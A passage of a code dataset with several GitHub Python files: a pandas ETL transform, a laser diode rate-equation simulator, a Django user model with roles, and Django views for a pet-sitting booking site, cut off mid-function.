\"\"\"\n\n data_df = extract_csv()\n\n #Removing PACKAGE_ID column because all it's values are null\n data_df = data_df.drop('PACKAGE_ID', axis=1)\n\n #Removing duplicates in CDR_ID and ICCID\n data_df = data_df.drop_duplicates(subset=['CDR_ID','ICCID'])\n\n #Converting columns to datetime\n data_df['CONNECT_TIME'] = pd.to_datetime(data_df['CONNECT_TIME'])\n data_df['CLOSE_TIME'] = pd.to_datetime(data_df['CLOSE_TIME'])\n\n data_df['COMPANY_NAME'] = data_df['COMPANY_NAME'].replace('Ubicate GPS', 'CLIENTE E')\n\n #Lowercase all columns\n data_df.columns = map(str.lower, data_df.columns)\n data_df = data_df.rename(columns={'iccid':'icc_id'})\n\n return data_df\n","repo_name":"Dantergy/etl_communications","sub_path":"tranform.py","file_name":"tranform.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16923668324","text":"'''\r\n###############################################################################\r\n########### Program to simulate laser-rate equations in Python ################\r\n########################## Niall Boohan 2020 ##################################\r\n###################### niall.boohan@tyndall.ie ################################\r\n###############################################################################\r\n\r\nBASED ON:\r\nTheory and equations sourced from:\r\nTitle: Diode Lasers and Photonic Integrated Circuits\r\nAuthor: Coldren, Larry A.\r\nYear: 1997\r\nCompensation values from:\r\nTitle: Comparison of rate-equation and Fabry-Perot approaches to modeling a\r\n diode laser\r\nAuthor: Daniel T. Cassidy\r\nYear: 1983\r\n-------------------------------------------------------------------------------\r\nNOTES:\r\n-Multimode calculation based on https://en.wikipedia.org/wiki/\r\n Laser_diode_rate_equations\r\n-Radiative and non-radiative recombination Schubert, E. 
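The cleaning steps in transform_data() above can be expressed as a single pandas chain; a sketch assuming the same column names and intended to match the original behavior, including the COMPANY_NAME replacement:

import pandas as pd

def transform(df: pd.DataFrame) -> pd.DataFrame:
    return (
        df.drop(columns='PACKAGE_ID')
          .drop_duplicates(subset=['CDR_ID', 'ICCID'])
          .assign(CONNECT_TIME=lambda d: pd.to_datetime(d['CONNECT_TIME']),
                  CLOSE_TIME=lambda d: pd.to_datetime(d['CLOSE_TIME']))
          .replace({'COMPANY_NAME': {'Ubicate GPS': 'CLIENTE E'}})
          .rename(columns=str.lower)
          .rename(columns={'iccid': 'icc_id'})
    )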
Fred\r\n'''\r\n\r\n# Import necessary libraries ###\r\nfrom scipy.integrate import ode\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport multiprocessing as mp\r\nimport functools as fn\r\n\r\n# Import parameters ###\r\nfrom fileinput import CUR, cur_sweep_mA, AL_CAV, LAM0, GAM, A, B, C, cl_cm,\\\r\n DG, EPS, M, q, vol_cm, vol_nm, vg_cm, f_Hz, r_l, r_r, IND_RID, D_IND, c, al_t, R_SP\r\n\r\n# Import functions ###\r\nfrom fileinput import p_mW, p_dBm, tp_m\r\n\r\n###############################################################################\r\n# Dashboard\r\n###############################################################################\r\n# Settings ###\r\nMM = 1 # 0 single mode, 1 multiple modes\r\nLI = 0 # Turn on LI sweep\r\nMODE_CALC = 10 # Sets number of modes to run calc over \r\n\r\n# Time contraints and initial conditions ###\r\nT1 = 5e-9 # Time to run calc for (s)\r\nDT = 1e-16 # Time step for calc (s)\r\nS0 = 0 # Initial photon conc (cm^-3)\r\nN0 = 1e16 # Initial carrier conc (cm^-3)\r\n\r\n# Multiprocessing settings ###\r\nNUM_PROC = 6\r\np = mp.Pool(NUM_PROC)\r\n\r\n###############################################################################\r\n# Pre-calculations\r\n###############################################################################\r\n# Convertions to specific value ranges for this code ###\r\ncur = CUR/1e3\r\ncur_sweep_A = [i/1e3 for i in cur_sweep_mA]\r\n\r\n# Single-mode operation values ###\r\nif MM == 0:\r\n g_m = np.array([al_t])\r\n m0 = 0 # Manually set m0 for single mode simulation\r\n wl_m = [LAM0]\r\n print('lam0=', LAM0, 'm')\r\n print('Gain m0 [Total loss]', al_t, 'cm^-1')\r\n\r\n\r\n# Read in modal gain ###\r\nif MM == 1:\r\n inp = np.load('INV_TMM.npz')\r\n wl_m = inp['WL']\r\n g_m = inp['gain'] # Import gain in cm^-1\r\n m0 = int(np.ceil(len(g_m)/2))\r\n wl_m0 = wl_m[m0]\r\n d_wl = abs(np.average([wl_m[i]-wl_m[i-1] for i in range(1, len(wl_m))]))\r\n g_band = d_wl*M # Gain band FWHM (nm)\r\n # Set limit on modes in file to run calc over\r\n g_m = g_m[m0-MODE_CALC:m0+MODE_CALC]\r\n wl_m = wl_m[m0-MODE_CALC:m0+MODE_CALC]\r\n m0 = int(np.ceil(len(g_m)/2)) # Reset m0\r\n\r\n# Simulation inputs/outputs ###\r\nT = [] # Time vector\r\ny0 = [N0] # Initial conds [N]\r\nfor i in range(len(g_m)+1): # Add initial S for each mode\r\n y0.append(S0)\r\nprint(\"m0 = \", m0)\r\n\r\n###############################################################################\r\n# Main function definition\r\n###############################################################################\r\ndef solver(y, cur): # Input current & init conds\r\n\r\n out = [] # Holder for all simulation outputs\r\n p = [cur, q, vol_cm, vg_cm, GAM] # Parameters for odes\r\n\r\n # Setup integrator with desired parameters ###\r\n r = ode(laser_rates).set_integrator('dopri5', nsteps = 1e6)\r\n r.set_f_params(p).set_initial_value(y, 0)\r\n\r\n # Simulation run & check ###\r\n while r.successful() and r.t+DT < T1:\r\n r.integrate(r.t + DT)\r\n out.append(r.y) # Makes a list of 1d arrays\r\n T.append(r.t)\r\n\r\n out = np.array(out) # Convert from list to 2d array\r\n\r\n return out\r\n\r\n\r\n\r\n# Define equations to be solved ###\r\ndef laser_rates(t, y, p):\r\n\r\n # Generate outputs for each mode ###\r\n dy = np.zeros([len(g_m)+2])\r\n\r\n # Carrier equation ###\r\n dy[0] = p[0]/(q*vol_cm) - coeff_gain(y[0], y[1], 0)*y[1]*vg_cm - tn(y[0])\r\n # Total carrier conc calc ###\r\n y[1] = sum([y[i] for i in range(2, len(dy))]) # Total stim emission\r\n # Calculation for each 
independent mode ###\r\n    for i in range(len(g_m)):\r\n        dy[i+2] = (GAM*coeff_gain(y[0], y[i], i)*vg_cm - 1/tp_m(g_m[i]))*y[i+2]\\\r\n        + GAM*R_SP\r\n        #dy[i+2] = (GAM*coeff_gain(y[0], y[i], i)*vg_cm - 1/tp_m(g_m[i]))*y[i+2]\\\r\n        #+ GAM*spont(y[0], wl_m[i])\r\n\r\n    # Display outputs of each mode ###\r\n    #print(y)\r\n\r\n    return dy\r\n\r\n\r\n###############################################################################\r\n# Supplementary definitions\r\n###############################################################################\r\n# Group index ###\r\ndef n_g(wl):\r\n    x = IND_RID-(LAM0-wl)*D_IND\r\n    #print('Group refractive index', x)\r\n    return x\r\n\r\n\r\n# Carrier decay rate (tn) removed above threshold ###\r\ndef tn(n):\r\n    x = A*n + B*(n**2) + C*(n**3)\r\n    y = x*n \r\n    y = \"{:e}\".format(y)\r\n    #print('Carrier Recomb', y, 'ps^-1')\r\n    return x\r\n\r\n\r\n# Gain log calc p277 C&C, compensated for cavity ###\r\ndef coeff_gain(n, s, itr): # s is modal total for photon conc\r\n    x = (r_l*r_r)*(DG*n)*(1/(1+abs(itr-m0)/M**2))*(1/(1+EPS*s))\r\n    y = \"{:e}\".format(x)\r\n    #print('Gain Factor', x,'cm^-1')\r\n    return x\r\n\r\n\r\ndef spont_band(wl):\r\n    x = 1/(1+(2*abs(LAM0-wl)/g_band)**2)\r\n    y = \"{:e}\".format(x)\r\n    #print('Spontaneous Band Factor', y)\r\n    return x\r\n\r\n# Coldren & Corzine appendix calculation laser-rate wiki spont factor ###\r\ndef beta_sp(wl):\r\n    x = (2/np.pi)*GAM*(wl**4)/(8*np.pi*vol_nm*(IND_RID**2)*n_g(wl)*g_band)#\\*spont_band(wl)\r\n    #x = 1e-3\r\n    #y = \"{:e}\".format(x)\r\n    #print('Spontaneous emission factor', y)\r\n    return x\r\n\r\n# Approximation from Cassidy [1983] cavity amplification ###\r\ndef spont(n, wl):\r\n    x = n*beta_sp(wl)*(1+(AL_CAV*cl_cm)/2)\r\n    #y = \"{:e}\".format(x)\r\n    #print('Spontaneous emission rate', y)\r\n    return x\r\n\r\n###############################################################################\r\n# Plotting function definitions\r\n###############################################################################\r\n# Takes in Y array & returns desired data ###\r\ndef proc_li(y):\r\n    y = np.array(y)\r\n    col = [y[i][-1] for i in range(len(y))]\r\n    car_conc = [col[i][0] for i in range(len(col))]\r\n    pow_tot = [p_mW(col[i][1]) for i in range(len(col))]\r\n    pow_m = [p_mW(col[i][2:]) for i in range(len(col))]\r\n\r\n    return pow_tot, pow_m\r\n\r\n\r\n# Takes in Y array & returns desired data for dynamic calc ###\r\ndef proc_dynam_mm(y):\r\n    y = np.array(y)\r\n    car_conc = y[:, 0]\r\n    pow_tot = p_mW(y[:, 1])\r\n    pow_m = p_mW(y[:, 2:])\r\n    pow_0 = p_mW(y[:, m0+1])\r\n    y_end = y[-1, 1:]\r\n\r\n    return car_conc, pow_tot, pow_m, pow_0, y_end\r\n\r\n\r\n# Dynamic plotting ###\r\ndef plot_dynam_s(car_conc, phot_conc):\r\n\r\n    f, axarr = plt.subplots(2, sharex=True)  # Two subplots\r\n    axarr[0].plot(T, car_conc, 'g')\r\n    axarr[0].set_ylabel(\"Carrier Conc ($cm^{-3}$)\")\r\n    axarr[0].set_title('Laser-Rate Simulation')\r\n    axarr[1].plot(T, phot_conc, 'b')\r\n    axarr[1].set_ylabel(\"Modal Power (mW)\")\r\n    axarr[1].set_xlabel(\"Time (s)\")\r\n    plt.show()\r\n\r\n    return\r\n\r\n\r\n# Dynamic plotting ###\r\ndef plot_dynam_mm(pow_m):\r\n    plt.plot(T, pow_m)\r\n    plt.ylabel(\"Power (mW)\")\r\n    plt.title('Laser-Rate Simulation')\r\n    #plt.ylim(0, 3e16)\r\n    plt.xlabel(\"Time (s)\")\r\n    plt.show()\r\n\r\n    return\r\n\r\n\r\n# SMSR plotting ###\r\ndef smsr(pow_m):\r\n\r\n    print(pow_m)\r\n    # Steady-state SMSR ###\r\n    plt.plot(wl_m, p_dBm(pow_m[-1]), '-*')\r\n    plt.xlabel('WL (nm)')\r\n    plt.ylabel('Power (dBm)')\r\n    plt.title('Spectrum')\r\n    plt.show()\r\n\r\n    # 
Dynamic SMSR ###\r\n max_val = max(pow_m[-1])\r\n max_index = np.where(pow_m == max_val)\r\n sort = np.sort(pow_m[-1])\r\n val = sort[-2]\r\n ind = np.where(pow_m[-1]==val)\r\n pow_0 = [pow_m[i][m0] for i in range(len(T))]\r\n pow_nn = [pow_m[i][m0+1] for i in range(len(T))]\r\n pow_band = [pow_m[i][ind] for i in range(len(T))]\r\n smsr_nn = [p_dBm(pow_nn[i]) - p_dBm(pow_0[i]) for i in range(len(T))]\r\n smsr = [p_dBm(pow_band[i]) - p_dBm(pow_0[i]) for i in range(len(T))]\r\n plt.plot(T, smsr_nn, label='Nearest Neighbour')\r\n plt.plot(T, smsr, label='Across Band')\r\n plt.ylabel(\"Supression (dB)\")\r\n plt.title('Dynamic SMSR')\r\n plt.xlabel(\"Time (s)\")\r\n plt.legend()\r\n plt.show()\r\n\r\n return\r\n\r\n\r\ndef plot_li_s(pow_tot, pow_m):\r\n\r\n # Post solver calculations\r\n qe = [i/j for i, j in zip(pow_tot, cur_sweep_mA)] # Convert to QE\r\n\r\n # Plotting two parameters on one plot ###\r\n fig, ax1 = plt.subplots()\r\n ax2 = ax1.twinx()\r\n ax1.plot(cur_sweep_mA, pow_tot, 'g-')\r\n ax2.plot(cur_sweep_mA, qe, 'b-')\r\n ax1.set_xlabel('Current (mA)')\r\n ax1.set_ylabel('Power (mW)', color='g')\r\n ax2.set_ylabel('Quantum Efficiency', color='b')\r\n plt.title(\"Single Mode LI\")\r\n plt.show()\r\n\r\n plt.plot(cur_sweep_mA, pow_m)\r\n plt.title('Multimode LI')\r\n plt.xlabel('Current (mA)')\r\n plt.ylabel('Power (mW)')\r\n plt.show()\r\n\r\n return\r\n\r\n\r\n###############################################################################\r\n# Main section to call functions\r\n###############################################################################\r\nif __name__ == '__main__':\r\n tic = time.perf_counter()\r\n # Dynamic single mode ###\r\n if MM == 0 and LI == 0:\r\n res = solver(y0, CUR)\r\n n, pow_tot, pow_m, pow_0, y_end = proc_dynam_mm(res)\r\n toc = time.perf_counter()\r\n print(f\"The code executed in {toc - tic:0.4f} seconds\")\r\n plot_dynam_s(n, pow_0)\r\n\r\n # Dynamic multi-mode ###\r\n if MM == 1 and LI == 0:\r\n res = solver(y0, cur)\r\n #res = p.map(solver, y0, CUR)\r\n toc = time.perf_counter()\r\n print(f\"The code executed in {toc - tic:0.4f} seconds\")\r\n n, pow_tot, pow_m, pow_0, y_end = proc_dynam_mm(res)\r\n plot_dynam_mm(pow_m)\r\n smsr(pow_m)\r\n \r\n # Relaunch calc again at ss to extract LW data\r\n y_end[0] = n[-1]+n[-1]/10 # 10% modulation applied\r\n y_end = y_end.tolist()\r\n y_end.insert(1, 0) # Inset initial carrier conc\r\n T.clear() # Empty time list to reuse\r\n res = solver(y_end, cur)\r\n n, pow_tot, pow_m, pow_0, y_end = proc_dynam_mm(res)\r\n np.savez('Rate_out.npz', T, n, pow_0)\r\n \r\n # Steady-state single-mode LI ###\r\n if LI == 1:\r\n res = p.map(fn.partial(solver, y0), cur_sweep_A)\r\n m0, m = proc_li(res)\r\n toc = time.perf_counter()\r\n print(f\"The code executed in {toc - tic:0.4f} seconds\")\r\n plot_li_s(m0, m)\r\n","repo_name":"boohann/SFP_modelling_pubilc","sub_path":"rate_eqns.py","file_name":"rate_eqns.py","file_ext":"py","file_size_in_byte":11289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38791337311","text":"from django.contrib.auth.models import AbstractUser\nfrom django.contrib.auth.models import Group as BaseGroup\nfrom django.db import models\n\n\nclass Group(BaseGroup):\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n proxy = True\n\n\nclass User(AbstractUser):\n\n USER = 'user'\n MODERATOR = 'moderator'\n ADMIN = 'admin'\n ROLE_CHOICES = [\n (USER, 'Пользователь'),\n (MODERATOR, 'Модератор'),\n (ADMIN, 
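The SMSR curves computed in smsr() above are dBm differences between the main mode and a side mode, which is just 10*log10 of the linear power ratio; a quick numeric check (the helper name is mine, not from rate_eqns.py):

import math

def smsr_db(p_main_mw, p_side_mw):
    # Side-mode suppression ratio in dB from mode powers in mW.
    return 10 * math.log10(p_main_mw / p_side_mw)

assert round(smsr_db(1.0, 0.001)) == 30   # 0 dBm main vs -30 dBm side mode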
'Администратор')\n ]\n\n email = models.EmailField(unique=True, verbose_name='Email')\n first_name = models.CharField(\n max_length=150, blank=True, verbose_name='Имя'\n )\n bio = models.TextField(blank=True, verbose_name='О себе')\n role = models.CharField(\n max_length=30, choices=ROLE_CHOICES, default=USER, verbose_name='Роль'\n )\n confirmation_code = models.TextField(\n null=True, verbose_name='Код подтверждения'\n )\n\n class Meta:\n verbose_name = 'Пользователь'\n verbose_name_plural = 'Пользователи'\n\n def __str__(self):\n return self.username\n\n def save(self, *args, **kwargs):\n if self.role:\n if self.role == self.ADMIN:\n self.is_superuser = True\n self.is_staff = True\n if self.role == self.MODERATOR:\n self.is_staff = True\n return super(User, self).save(*args, **kwargs)\n if self.is_superuser:\n self.role = self.ADMIN\n elif self.is_staff:\n self.role = self.MODERATOR\n else:\n self.role = self.USER\n return super(User, self).save(*args, **kwargs)\n\n @property\n def is_admin(self):\n return self.role == 'admin'\n","repo_name":"Alexey-Bormotov/api_yamdb","sub_path":"api_yamdb/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24343906827","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render\nfrom core.decorators import miiowner_required, agreed_terms_required\nfrom core.models import User, Pets, SitterServices, ServicePhotos, MiiSitter\nfrom core.models import ServiceBooking, ServiceLocation, ServiceReviews\nfrom django.views.generic import ListView\nfrom django.db.models import Q, Sum\nfrom core.methods import sort_out_dates, filter_on_location, return_day_of_week_from_date, generate_review_html_start\nfrom core.methods import get_options_of_timeslots_walk_sit, get_options_of_timeslots_board_daycare\nfrom .forms import BookService\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.core import mail\nfrom django.conf import settings\nfrom datetime import datetime, timedelta, timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\ndef view_all_services(request):\n \"\"\"\n This view allows everyone to view all current services\n \"\"\"\n try:\n if request.user.is_sitter:\n context = {\n \"title\": \"All Services\",\n \"sitter_user\":True\n }\n else:\n context = {\n \"title\": \"All Services\",\n \"sitter_user\":False\n }\n except:\n context = {\n \"title\": \"All Services\",\n \"sitter_user\":False\n }\n\n return render(request, 'services/all-services.html', context)\n\n\ndef view_services(request, type):\n \"\"\"\n This view allows everyone to view all current Services\n \"\"\"\n\n # get all services with type requested\n type_dictionary = {\"Walker\":\"WALK\",\n 'Boarding' :'BOARD',\n 'Sitter' :'SIT',\n 'Daycare' :'DAYCARE'}\n\n if request.method==\"GET\":\n #check if type correct for filtering\n try:\n if request.GET['service_type_input'] in type_dictionary.keys():\n type = [type_dictionary[request.GET['service_type_input']]]\n else:\n type = list(type_dictionary.values())\n except:\n try:\n type = [type_dictionary[type]]\n except:\n type = [type]\n\n #check if dates are correct\n try:\n start_date, end_date = sort_out_dates(request.GET['date_begin_input'],\n request.GET['date_end_input'])\n except:\n start_date, end_date = 
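The two-way sync in User.save() above ties the role field to Django's permission flags; the forward mapping it applies when a role is set, shown in isolation (a sketch, not part of the model; note the original never clears the flags for plain users):

ROLE_TO_FLAGS = {
    'admin': (True, True),       # (is_superuser, is_staff)
    'moderator': (False, True),
    'user': (False, False),
}

def flags_for(role):
    return ROLE_TO_FLAGS.get(role, (False, False))

assert flags_for('admin') == (True, True)
assert flags_for('moderator') == (False, True)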
sort_out_dates('', '')\n\n\n try:\n price_start = request.GET['price_start']\n if price_start == \"\":\n price_start = 0\n except:\n price_start = 0\n\n try:\n price_end = request.GET['price_end']\n if price_end == \"\":\n price_end = 500\n except:\n price_end = 500\n\n price_start = int(price_start)\n price_end = int(price_end)\n\n if price_start> price_end:\n price_start, price_end = price_end, price_start\n\n\n # checking for pet type\n try:\n pet_type = request.GET['pet_type']\n except:\n pet_type = \"All Pets\"\n\n try:\n review_score = request.GET['review_score']\n if review_score == \"Review score\":\n review_score = -1\n else:\n review_score = int(review_score[0])\n\n except:\n review_score = -1\n\n #get relevant services not based on location\n if pet_type == \"All Pets\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(review_score__gte=review_score))\n\n elif pet_type == \"Dog\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(dogs_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Cat\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(cats_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Bird\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(birds_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Reptile\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(reptiles_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Other\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(other_pets_allowed=True)&\n Q(review_score__gte=review_score))\n\n\n if len(services) < 1:\n services = SitterServices.objects.filter(Q(allowed_to_show=True))\n\n #filter on location\n try:\n location_input = request.GET['location_input']\n services,locations = filter_on_location(services, location_input)\n reviews = [generate_review_html_start(service.review_score) for service in services]\n number_of_reviews = [service.number_of_reviews for service in services]\n except:\n location_input = \"Location\"\n ids = [service.id for service in services]\n locations = ServiceLocation.objects.filter(id__in=ids)\n reviews = [generate_review_html_start(service.review_score) for service in services]\n number_of_reviews = [service.number_of_reviews for service in services]\n\n # if not location_input:\n # location_input = \"Location\"\n\n services = zip(services, locations, reviews, number_of_reviews)\n try:\n if request.user.is_sitter:\n context = {\n \"title\": \"View pet services\",\n \"type\":\"Services\",\n \"sitter_user\":True,\n \"services\":services,\n \"location_input\":location_input,\n \"google_api\":str(settings.GOOGLE_API_KEY),\n\n }\n 
else:\n context = {\n \"title\": \"View pet services\",\n \"type\":\"Services\",\n \"sitter_user\":False,\n \"services\":services,\n \"location_input\":location_input,\n \"google_api\":str(settings.GOOGLE_API_KEY),\n }\n except:\n context = {\n \"title\": \"View pet services\",\n \"type\":\"Services\",\n \"sitter_user\":False,\n \"services\":services,\n \"location_input\":location_input,\n \"google_api\":str(settings.GOOGLE_API_KEY),\n }\n\n\n return render(request, 'services/single-type-services.html', context)\n\n\ndef view_single_service(request, service_id):\n\n # get all services with type requested\n type_dictionary = {\"WALK\":\"Walking Service\",\n 'BOARD':\"Boarding Service\",\n 'SIT' :'Sitting Service',\n 'DAYCARE' :'Daycare Service'}\n\n service = SitterServices.objects.get(id=service_id)\n reviews = ServiceReviews.objects.filter(service=service)\n reviews_paginator = Paginator(reviews, 5)\n\n # check if service should be updated (only every 5 hours)\n now = datetime.now(timezone.utc)\n difference = now - service.updated_at\n total_hours = difference.days*24\n try:\n if total_hours>5:\n number_of_reviews = ServiceReviews.objects.filter(service=service).count()\n service.number_of_reviews = number_of_reviews\n service.review_score = ServiceReviews.objects.filter(service=service).aggregate(Sum('review_score'))['review_score__sum']/number_of_reviews\n service.save(update_fields=[\"number_of_reviews\", \"review_score\"])\n except:\n print(\"couldnt update\")\n\n\n # check if sitter should be updated (only every 5 hours)\n now = datetime.now(timezone.utc)\n difference = now - service.sitter.updated_at\n total_hours = difference.days*24\n try:\n if total_hours>5:\n sitter = MiiSitter.objects.get(user=service.sitter)\n number_of_services = SitterServices.objects.filter(sitter=service.sitter).count()\n sitter_review_score = SitterServices.objects.filter(sitter=service.sitter).aggregate(Sum('review_score'))['review_score__sum']/number_of_services\n number_of_bookings = ServiceBooking.objects.filter(service=service).count()\n\n sitter.review_score = sitter_review_score\n sitter.number_of_bookings = number_of_bookings\n sitter.save(update_fields=[\"review_score\", \"number_of_bookings\"])\n except:\n print(\"couldnt update sitter\")\n\n similar_services = SitterServices.objects.filter(\n Q(type=service.type) &\n Q(allowed_to_show=True)&\n (Q(price__lte=service.price*1.2) & Q(price__gte=service.price*0.8)) &\n ~Q(id = service.id))\n\n photos = ServicePhotos.objects.filter(service=service)\n location = ServiceLocation.objects.get(service=service)\n sitter = User.objects.get(id=service.sitter.id)\n miisitter = MiiSitter.objects.get(user=sitter)\n\n\n time_converter = {'9999':\"Not availibe\",\n '1':\"01:00\",\n '2':\"02:00\",\n \"3\":\"03:00\",\n \"4\":\"04:00\",\n \"5\":\"05:00\",\n \"7\":\"06:00\",\n \"6\":\"07:00\",\n \"8\":\"08:00\",\n \"9\":\"09:00\",\n \"10\":\"10:00\",\n \"11\":\"11:00\",\n \"12\":\"12:00\",\n \"13\":\"13:00\",\n \"14\":\"14:00\",\n \"15\":\"15:00\",\n \"16\":\"16:00\",\n \"17\":\"17:00\",\n \"18\":\"18:00\",\n \"19\":\"19:00\",\n \"20\":\"20:00\",\n \"21\":\"21:00\",\n \"22\":\"22:00\",\n \"23\":\"23:00\",\n \"0\":\"00:00\"}\n\n if request.method == 'POST':\n form = BookService(request.POST, user = request.user, service = service)\n if form.is_valid():\n booking = form.save()\n return redirect('services-booking-confirmation', service_id = service.id, booking_id = booking.id)\n else:\n form = BookService(user = request.user, service = service)\n\n\n page = 
request.GET.get('page', 1)\n    try:\n        reviews = reviews_paginator.page(page)\n    except PageNotAnInteger:\n        reviews = reviews_paginator.page(1)\n    except EmptyPage:\n        reviews = reviews_paginator.page(reviews_paginator.num_pages)\n\n    try:\n        if request.user.is_sitter:\n            context = {\n                \"title\": \"Single pet service\",\n                \"sitter\":sitter,\n                \"miisitter\":miisitter,\n                \"reviews\":reviews,\n                \"similar_services\":similar_services,\n                \"sitter_user\":True,\n                \"review_html\":generate_review_html_start(service.review_score),\n                'type':type_dictionary[service.type],\n                \"service_name\":service.service_name,\n                \"service_description\":service.description,\n                'price':service.price,\n                'photos':photos,\n                'service':service,\n                'location':location.city+\", \"+location.province,\n                'monday_start_time':time_converter[str(service.time_start_monday)],\n                'tuesday_start_time':time_converter[str(service.time_start_tuesday)],\n                'wednesday_start_time':time_converter[str(service.time_start_wednesday)],\n                'thursday_start_time':time_converter[str(service.time_start_thursday)],\n                'friday_start_time':time_converter[str(service.time_start_friday)],\n                'saturday_start_time':time_converter[str(service.time_start_saturday)],\n                'sunday_start_time':time_converter[str(service.time_start_sunday)],\n                'monday_end_time':time_converter[str(service.time_end_monday)],\n                'tuesday_end_time':time_converter[str(service.time_end_tuesday)],\n                'wednesday_end_time':time_converter[str(service.time_end_wednesday)],\n                'thursday_end_time':time_converter[str(service.time_end_thursday)],\n                'friday_end_time':time_converter[str(service.time_end_friday)],\n                'saturday_end_time':time_converter[str(service.time_end_saturday)],\n                'sunday_end_time':time_converter[str(service.time_end_sunday)],\n                'form':form\n            }\n        else:\n            context = {\n                \"title\": \"Single pet service\",\n                \"sitter\":sitter,\n                \"similar_services\":similar_services,\n                \"miisitter\":miisitter,\n                \"reviews\":reviews,\n                \"sitter_user\":False,\n                'type':type_dictionary[service.type],\n                
\"review_html\":generate_review_html_start(service.review_score),\n \"service_name\":service.service_name,\n \"service_description\":service.description,\n 'price':service.price,\n 'photos':photos,\n 'service':service,\n 'location':location.city+\", \"+location.province,\n 'monday_start_time':time_converter[str(service.time_start_monday)],\n 'tuesday_start_time':time_converter[str(service.time_start_tuesday)],\n 'wednesday_start_time':time_converter[str(service.time_start_wednesday)],\n 'thursday_start_time':time_converter[str(service.time_start_thursday)],\n 'friday_start_time':time_converter[str(service.time_start_friday)],\n 'saturday_start_time':time_converter[str(service.time_start_saturday)],\n 'sunday_start_time':time_converter[str(service.time_start_sunday)],\n 'monday_end_time':time_converter[str(service.time_end_monday)],\n 'tuesday_end_time':time_converter[str(service.time_end_tuesday)],\n 'wednesday_end_time':time_converter[str(service.time_end_wednesday)],\n 'thursday_end_time':time_converter[str(service.time_end_thursday)],\n 'friday_end_time':time_converter[str(service.time_end_friday)],\n 'saturday_end_time':time_converter[str(service.time_end_saturday)],\n 'sunday_end_time':time_converter[str(service.time_end_sunday)],\n 'form':form\n }\n\n return render(request, 'services/single-service.html', context)\n\n\ndef load_timeslots(request, service_id):\n date = request.GET.get('date')\n service = SitterServices.objects.get(id=service_id)\n day_of_week = return_day_of_week_from_date(date)\n\n if day_of_week == \"Monday\":\n time_start = service.time_start_monday\n time_end = service.time_end_monday\n elif day_of_week == \"Tuesday\":\n time_start = service.time_start_tuesday\n time_end = service.time_end_tuesday\n elif day_of_week == \"Wednesday\":\n time_start = service.time_start_wednesday\n time_end = service.time_end_wednesday\n elif day_of_week == \"Thursday\":\n time_start = service.time_start_thursday\n time_end = service.time_end_thursday\n elif day_of_week == \"Friday\":\n time_start = service.time_start_friday\n time_end = service.time_end_friday\n elif day_of_week == \"Saturday\":\n time_start = service.time_start_saturday\n time_end = service.time_end_saturday\n elif day_of_week == \"Sunday\":\n time_start = service.time_start_sunday\n time_end = service.time_end_sunday\n\n if time_start == 9999:\n return render(request,\n 'services/time_slots_options.html',\n {'timeslots': [[9999, \"Not availibe on {}\".format(day_of_week)]]})\n\n\n bookings = ServiceBooking.objects.filter(Q(service=service) &\n Q(start_date = date)).values_list('time_slot',\n 'number_of_pets')\n bookings = list(set(bookings))\n\n #get time_slots\n taken_slots = [x[0] for x in bookings]\n number_of_pets = [x[1] for x in bookings]\n\n list_of_options = get_options_of_timeslots_walk_sit(taken_slots,\n time_start,\n time_end)\n\n return render(request, 'services/time_slots_options.html', {'timeslots': list_of_options})\n\n\ndef send_sitter_confirmation_email(service, booking, user, email_address):\n \"\"\"\n Send email to sitter after owner makes a booking\n \"\"\"\n\n time_to_interval_converter = {\n 9999:\"Whole day\",\n 1:\"01:00-02:00\",\n 2:\"02:00-02:00\",\n 3:\"03:00-04:00\",\n 4:\"04:00-05:00\",\n 5:\"05:00-06:00\",\n 6:\"06:00-07:00\",\n 7:\"07:00-08:00\",\n 8:\"08:00-09:00\",\n 9:\"09:00-10:00\",\n 10:\"10:00-11:00\",\n 11:\"11:00-12:00\",\n 12:\"12:00-13:00\",\n 13:\"13:00-14:00\",\n 14:\"14:00-15:00\",\n 15:\"15:00-16:00\",\n 16:\"16:00-17:00\",\n 17:\"17:00-18:00\",\n 18:\"18:00-19:00\",\n 
